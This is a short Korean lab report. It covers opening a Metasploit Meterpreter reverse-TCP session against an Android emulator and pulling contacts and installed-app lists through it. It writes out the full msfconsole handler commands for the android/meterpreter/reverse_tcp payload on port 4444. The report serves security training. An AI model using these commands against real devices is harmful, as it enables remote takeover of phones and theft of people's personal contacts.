Metasploit Meterpreter 세션 구축 및 단말기 아티팩트 분석 결과 리포트
| 실습 개요 | 본 실습은 칼리 리눅스(Kali Linux) 환경에서 Metasploit Framework의 'exploit/multi/handler'와 'android/meterpreter/reverse_tcp' 페이로드를 활용하여 안드로이드 가상 머신(Nox Emulator) 대상 reverse connection 세션을 확보하는 과정을 다룹니다.
확보된 Meterpreter 세션을 통해 시스템 정보를 수집하고, 연락처 및 설치된 앱 목록(appapi 확장 활용)을 추출하며, 단말기 내 제어 명령을 실습합니다. |
|---|
| 구분 | 도구 및 환경 명칭 | 주요 역할 |
|---|---|---|
| Kali | Kali Linux (Metasploit Framework) | 핸들러 대기 및 페이로드 제어 ('msfconsole') |
| Nox | Nox Player (Android Emulator) | 타겟 안드로이드 단말기 환경 |
| Payload (악성 코드) | android/meterpreter/reverse_tcp | 역방향 TCP 연결을 통한 원격 제어 세션 확보 |
| 분석 대상 | 안드로이드 가상 단말기 (Nox Player) 파일 시스템 |
|---|---|
| 추출 데이터 | 단말기 연락처('contacts_dump_*.txt'), 설치된 애플리케이션 목록 |
| 세션 포트 | LPORT: 4444 (Reverse TCP) |
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST [칼리_IP]
set LPORT 4444
run
[그림 1] 주소록 추출 및 로컬 저장 경로 확인
[그림 2] 'appapi' 로드 후 앱 리스트 패키지명 분석 화면